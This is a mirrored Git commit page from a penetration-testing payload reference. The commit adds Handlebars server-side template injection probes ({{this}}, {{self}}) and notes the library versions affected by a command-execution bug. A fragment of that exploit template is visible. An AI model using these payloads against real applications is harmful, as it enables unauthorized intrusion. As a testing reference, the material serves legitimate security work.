ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 10:26:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Handlebars - Basic Injection

Browse Source
This commit is contained in:
Swissky 2024-11-25 18:42:36 +01:00
parent 6bfad6a84d
commit 9425cec068
1 changed files with 15 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
Server Side Template Injection/JavaScript.md
View File

@ -7,6 +7,7 @@
- [Templating Libraries](#templating-libraries)
- [Handlebars](#handlebars)
- [Handlebars - Basic Injection](#handlebars---basic-injection)
- [Handlebars - Command Execution](#handlebars---command-execution)
- [Lodash](#Lodash)
- [Lodash - Basic Injection](#lodash---basic-injection)
@ -38,8 +39,21 @@
[Official website](https://handlebarsjs.com/)
> Handlebars compiles templates into JavaScript functions.
### Handlebars - Basic Injection
```js
{{this}}
{{self}}
```
### Handlebars - Command Execution
This payload only work in handlebars versions, fixed in [GHSA-q42p-pg8m-cqh6](https://github.com/advisories/GHSA-q42p-pg8m-cqh6):
* `>= 4.1.0`, `< 4.1.2`
* `>= 4.0.0`, `< 4.0.14`
* `< 3.0.7`
```handlebars
{{#with "s" as |string|}}
{{#with "e"}}
@ -67,6 +81,7 @@
## Lodash
[Official website](https://lodash.com/docs/4.17.15)
> A modern JavaScript utility library delivering modularity, performance & extras.
### Lodash - Basic Injection